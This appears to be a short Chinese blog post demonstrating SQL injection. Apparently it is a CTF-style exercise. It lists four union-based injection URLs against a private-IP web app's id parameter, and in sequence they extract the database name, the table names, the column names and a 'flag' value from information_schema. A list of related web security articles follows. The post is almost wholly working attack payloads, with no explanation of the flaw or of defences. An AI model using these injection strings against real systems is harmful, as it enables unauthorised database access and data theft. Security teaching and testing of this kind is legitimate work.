网络安全sql注入实战演示

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---库名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---表名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---列名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---值

相关推荐
轻舟行712 小时前
常见的网站文件后缀名
web安全·网络安全
xixixi7777713 小时前
水坑攻击的攻击原理和特点+案例和防御方法
网络·安全·web安全
携欢15 小时前
PortSwigger靶场之盲 SSRF(服务器端请求伪造)漏洞通关秘籍
前端·网络·安全·web安全
网安小白的进阶之路1 天前
A模块 系统与网络安全 第四门课 弹性交换网络-4
网络·web安全·php
落一落,掉一掉1 天前
第十五周Fscan和利用漏洞上线远程和数据库提权上线远控
安全·web安全
九河云1 天前
数字化转型中的网络安全风险与零信任架构实践
运维·科技·安全·web安全·架构
jenchoi4131 天前
【2025-11-02】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
安全·web安全·网络安全
上海云盾-高防顾问1 天前
什么是端口管理?网络安全的关键环节
安全·web安全
风语者日志1 天前
[LitCTF 2023]作业管理系统
前端·网络·安全·web安全·ctf
Never_z&y2 天前
攻防世界-cat_cat_new(任意文件读取、Linux敏感文件、flask-session伪造)
web安全